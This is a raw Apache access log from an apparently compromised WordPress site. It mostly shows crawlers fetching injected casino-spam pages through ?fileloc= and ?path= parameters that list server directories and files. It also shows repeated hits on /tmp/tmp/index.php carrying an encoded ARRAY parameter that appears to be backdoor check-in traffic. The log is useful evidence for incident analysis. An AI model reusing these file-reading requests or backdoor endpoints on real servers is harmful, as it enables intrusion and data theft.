216.73.216.11 - - [01/Nov/2025:08:47:11 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FExpression%2FRegex.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FExpression HTTP/1.1" 200 4079 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:12 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FCallback.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3166 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:47:13 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FCountryValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3106 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:47:15 -0400] "GET /m187013607?srsltid=AfmBOoqMtvVOZDkN2vug3y_j0ui4nWGZw_w9SWeGvC-F-TKXAcxPiK HTTP/1.1" 200 19024 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:47:13 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents%2FTabAISuite.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fcomponents HTTP/1.1" 200 6523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.198 - - [01/Nov/2025:08:47:13 -0400] "GET /q-~4TbtH57gq5E4UCI87NqFyw4X2jdaOXD7157/?path=/home/creaqbdc/public_html/wp-includes/php-compat HTTP/1.1" 200 2801 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
44.197.76.210 - - [01/Nov/2025:08:47:15 -0400] "GET /blogs/?path=//lib/modprobe.d HTTP/1.1" 200 3439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:47:16 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-profiles-cloudlinux/clsolo HTTP/1.1" 200 3133 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:47:17 -0400] "GET /q-~177NHtiqf0iGNCvd1AUu4jD5mLUvc834p17700/ HTTP/1.1" 200 4130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
34.224.9.144 - - [01/Nov/2025:08:47:20 -0400] "GET /portfolio-commercial/?fileloc=//usr/bin/autoupdate&path=//usr/bin HTTP/1.1" 200 16100 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:47:21 -0400] "GET /m069015289?srsltid=AfmBOoFsHVgYMvkZtwmyQZ_HaECS5t6US_Y4clRHnz-S-xWewSaWSN HTTP/1.1" 200 20561 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:47:22 -0400] "GET /m071006035?srsltid=AfmBOoaaspiAmfMKUDjg1V_slZH9GyshZ_vexV5OGa-O-7sI4M5G7N HTTP/1.1" 200 19490 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:47:23 -0400] "GET /q-~157LI7urw1NAnHnWXj7TM8KTX9KoozZHa45256/ HTTP/1.1" 200 18986 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:47:23 -0400] "GET /m153028951?srsltid=AfmBOoIBqPiClETCCWDtgc_upcVXUsJcU_43mj9gL3-S-TO834C8R0 HTTP/1.1" 200 20006 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
18.208.11.93 - - [01/Nov/2025:08:47:23 -0400] "GET /book-of-ra-fur-nusse-zum-besten-geben-blos-eintragung/?path=//usr/lib/firewalld/zones HTTP/1.1" 200 3768 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:47:26 -0400] "GET /m017001751?srsltid=AfmBOoHHFEYLmZyjI16daw_2KcIpuMuhX_cRW4xUxP-N-iFadaDnHY HTTP/1.1" 200 4143 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.223 - - [01/Nov/2025:08:47:26 -0400] "GET /?fileloc=//proc/self/root/proc/2966092/root/opt/cloudlinux/venv/bin/coverage-3.11&path=//proc/self/root/proc/2966092/root/opt/cloudlinux/venv/bin HTTP/1.1" 200 2653 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.197.28.78 - - [01/Nov/2025:08:47:27 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?fileloc=//lib/dracut/dracut-functions.sh&path=//lib/dracut HTTP/1.1" 200 10050 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:47:28 -0400] "GET /q-~51Cy7o9fonPmKuBXEyGQf2TYkJzEjDhJ45124/ HTTP/1.1" 200 4150 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:47:29 -0400] "GET /m291047019?srsltid=AfmBOooUHaahFIlvb3ICig_wXyZtnxXS7_x9F1J4xh-H-8zbZ4SXys HTTP/1.1" 200 19760 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.188.200.18 - - [01/Nov/2025:08:42:30 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343535302p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303935302q3431363330353862653866383264323033633730613363646130303837666535222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:47:30 -0400] "GET /q-~52RXLdEj4OKzq4EGXW5ytpM1a7RMdFQU8981/ HTTP/1.1" 200 4108 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.65.197 - - [01/Nov/2025:08:47:31 -0400] "GET /q-~35juX5YgxqvYQYMCPn6sDrzrraYPZTVi18528/ HTTP/1.1" 200 18383 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.239.197.197 - - [01/Nov/2025:08:47:31 -0400] "GET /beste-versorger-provision/?fileloc=//opt/cloudlinux/alt-php80/root/usr/include/php/Zend/zend.h&path=//opt/cloudlinux/alt-php80/root/usr/include/php/Zend HTTP/1.1" 200 7267 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:47:32 -0400] "GET /m299049775?srsltid=AfmBOojbtcMhztjQCoH4bB_AbzFc4FHyE_QrM4xMXy-D-XULXI2aFW HTTP/1.1" 200 18980 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.205.163.103 - - [01/Nov/2025:08:47:35 -0400] "GET /verkettete-liste-inside-5-linien-gemeinsam/?path=//usr/lib/.build-id/1a HTTP/1.1" 200 5131 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:47:36 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-openssl HTTP/1.1" 200 2947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:08:47:38 -0400] "GET /q-~92PWcNCKUkAdbDT5d0u7MuiajkHcOoEn10163/?path=/home/creaqbdc/public_html/creativefinishings.com HTTP/1.1" 200 2879 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:47:39 -0400] "GET /q-~135Cuy9W7nryvQhXQhiN1HQHe4EMBGz8L49606/ HTTP/1.1" 200 18986 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:47:39 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~210iEefYx7OLwJSSRl6b6reXHBCdQJlhZ30079/ HTTP/1.1" 200 18746 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.179.242 - - [01/Nov/2025:08:47:38 -0400] "GET /wp-includes/plf56b4b/edit.php?id=836336 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-includes/plf56b4b/edit.php?id=836336" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
3.232.102.111 - - [01/Nov/2025:08:47:40 -0400] "GET /services/flooring-installation/?path=//lib/python3.8/site-packages/__pycache__ HTTP/1.1" 200 3453 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:47:42 -0400] "GET /q-~275Ih8yMbJcJUOZCWzYdNPGKRIR8Opjqn41714/ HTTP/1.1" 200 4143 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.5.242.243 - - [01/Nov/2025:08:47:43 -0400] "GET /a-cosmic-journey-through-the-realm-of-space-xy/?path=//opt/cpanel/ea-ruby27/root/tmp HTTP/1.1" 200 3043 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:47:45 -0400] "GET /?path=//proc/self/root/proc/2966092/root/etc/cl.selector.conf.d HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:47:45 -0400] "GET /q-~147PrCMDyzZRv2jBrTgRtc2WFuzZSFMfH6464/ HTTP/1.1" 200 19881 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:08:47:47 -0400] "GET /q-~287rkpfgo2vSEcKca3prDBsBG0lxSHHZg3158/ HTTP/1.1" 200 4138 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:47:47 -0400] "GET /q-~296gtcDt79gosy4s5jaXDxR3ejtu1AVHd48279/?fileloc=/home/creaqbdc/public_html/wp-trackback.php&path=/home/creaqbdc/public_html HTTP/1.1" 200 19880 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
52.0.63.151 - - [01/Nov/2025:08:47:47 -0400] "GET /master-the-challenge-of-drop-the-boss-a-gamer-s/?path=//proc/self/root/lib/.build-id/d2 HTTP/1.1" 200 4610 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
199.188.200.18 - - [01/Nov/2025:08:42:51 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343537312p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303937312q3564326264323662623965393538613236663938356365303266313263306432222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
54.144.185.255 - - [01/Nov/2025:08:47:51 -0400] "GET /das-beste-world-wide-web-spielbank-via-herumtoben-vortragen/?path=//usr/lib/firmware/nvidia/gh100 HTTP/1.1" 200 3335 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:47:52 -0400] "GET /q-~69kkulI37RxTWKmXVGZUcYmotsu3jfyR27050/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.198 - - [01/Nov/2025:08:47:52 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~52IF0lHzNoCcLH40fwV3G5Cyk9VezJSV1447/ HTTP/1.1" 200 4147 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.65.198 - - [01/Nov/2025:08:47:54 -0400] "GET /q-~168haWq8OSPzDIJE6JipQJks1bT2psWwX1223/ HTTP/1.1" 200 19524 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.206.212.24 - - [01/Nov/2025:08:47:55 -0400] "GET /spielbank-pramie-ohne-einzahlung-beste-no-vorleistung-boni-2025/?fileloc=//usr/lib/systemd/user/sound.target&path=//usr/lib/systemd/user HTTP/1.1" 200 3231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:47:56 -0400] "GET /q-~51tGTkKIg2JSh0ZMzAl5ScyPGkxNjYcU29190/?fileloc=/home/creaqbdc/public_html/wp-auto8L.php&path=/home/creaqbdc/public_html HTTP/1.1" 200 6173 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:47:56 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/libcurl/bin HTTP/1.1" 200 2846 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
40.77.167.78 - - [01/Nov/2025:08:48:00 -0400] "GET /items/1827977489.htm HTTP/1.1" 200 18560 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.44.229.124 - - [01/Nov/2025:08:48:00 -0400] "GET /portfolio-commercial?fileloc=//opt/alt/openssl/include/openssl/ecdsa.h&path=//opt/alt/openssl/include/openssl HTTP/1.1" 200 6973 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:48:00 -0400] "GET /q-~296vsVU0vYhzCLzISI7QiRANsosBv3mdK7035/ HTTP/1.1" 200 4143 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.28.133.214 - - [01/Nov/2025:08:48:03 -0400] "GET /a-wild-ride-through-digital-dimensions-in-turbo/?path=//usr/share/zoneinfo/posix/Antarctica HTTP/1.1" 200 3939 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
40.77.167.123 - - [01/Nov/2025:08:48:04 -0400] "GET /items/449728098.htm HTTP/1.1" 200 17 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:48:04 -0400] "GET /q-~91fYK2SJs0iRWtbamlghxaaZ9gWGFjcu31298/ HTTP/1.1" 200 4158 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:48:05 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cloudlinux/venv/usr/bin HTTP/1.1" 200 2860 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:48:06 -0400] "GET /q-~86pyewL04LU82hAX8kAaDnGoRkJ9Icbs361/?path=//lib64 HTTP/1.1" 200 20064 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
52.45.29.57 - - [01/Nov/2025:08:48:07 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?fileloc=//lib/firmware/amdgpu/kabini_me.bin&path=//lib/firmware/amdgpu HTTP/1.1" 200 2965 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
199.188.200.18 - - [01/Nov/2025:08:43:11 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343539312p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303939312q3165666337323864346138633165353266633665326464316530326465663862222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:48:11 -0400] "GET /q-~296uCHjxvisEyMUHfWsMa2TiMBPg0mMDk21845/?fileloc=/home/creaqbdc/public_html/wp-config-sample.php&path=/home/creaqbdc/public_html HTTP/1.1" 200 22775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.119.232 - - [01/Nov/2025:08:48:11 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?path=//usr/lib/python3.6/site-packages/dateutil/__pycache__ HTTP/1.1" 200 4182 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:48:13 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/libtidy/bin HTTP/1.1" 200 2848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:48:16 -0400] "GET /q-~264uKytzblzskCgjYuAL6CZ3eC6X10jPA1591/?path=/home/creaqbdc/public_html/wp-content HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
52.71.203.206 - - [01/Nov/2025:08:48:16 -0400] "GET /the-internet-games-are-available-towards-a-professional-internet-casino/?path=//usr/lib/systemd/user-preset HTTP/1.1" 200 3355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:48:16 -0400] "GET /q-~186yzAFVsZtORsRXJ0RKnW1tImx7Zqlev2757/ HTTP/1.1" 200 4130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.6.97.88 - - [01/Nov/2025:08:48:19 -0400] "GET /spielbank-pramie-ohne-einzahlung-beste-no-vorleistung-boni-2025/?fileloc=//lib64/python2.7/Demo/pdist/cmdfw.pyc&path=//lib64/python2.7/Demo/pdist HTTP/1.1" 200 2974 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:48:20 -0400] "GET /q-~86pyewL04LU82hAX8kAaDnGoRkJ9Icbs361/?path=//dev HTTP/1.1" 200 2916 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.59 - - [01/Nov/2025:08:48:21 -0400] "GET /q-~257PHIJxwHfhsZcgEnVS7C0kMx4KRAFDp3312/ HTTP/1.1" 200 4149 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:48:22 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-brotli/include HTTP/1.1" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.23.99.55 - - [01/Nov/2025:08:48:24 -0400] "GET /book-of-ra-fur-nusse-zum-besten-geben-blos-eintragung/?path=//opt/alt/alt-nodejs16/root/var/spool/mail HTTP/1.1" 200 3067 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:48:25 -0400] "GET /q-~18H7IZeeEeZbIbp9nuqlsh0jJDkpwLCG26151/ HTTP/1.1" 200 4150 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.217.82.254 - - [01/Nov/2025:08:48:27 -0400] "GET /book-of-ra-fur-nusse-zum-besten-geben-blos-eintragung/?path=//lib64/python3.6/distutils/__pycache__ HTTP/1.1" 200 7722 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
199.188.200.18 - - [01/Nov/2025:08:43:31 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343631312p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030313031312q3832646434613863376662306132653664313336316537393536313666656631222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:48:30 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FDumper%2FXmlDumper.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FDumper HTTP/1.1" 200 5054 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
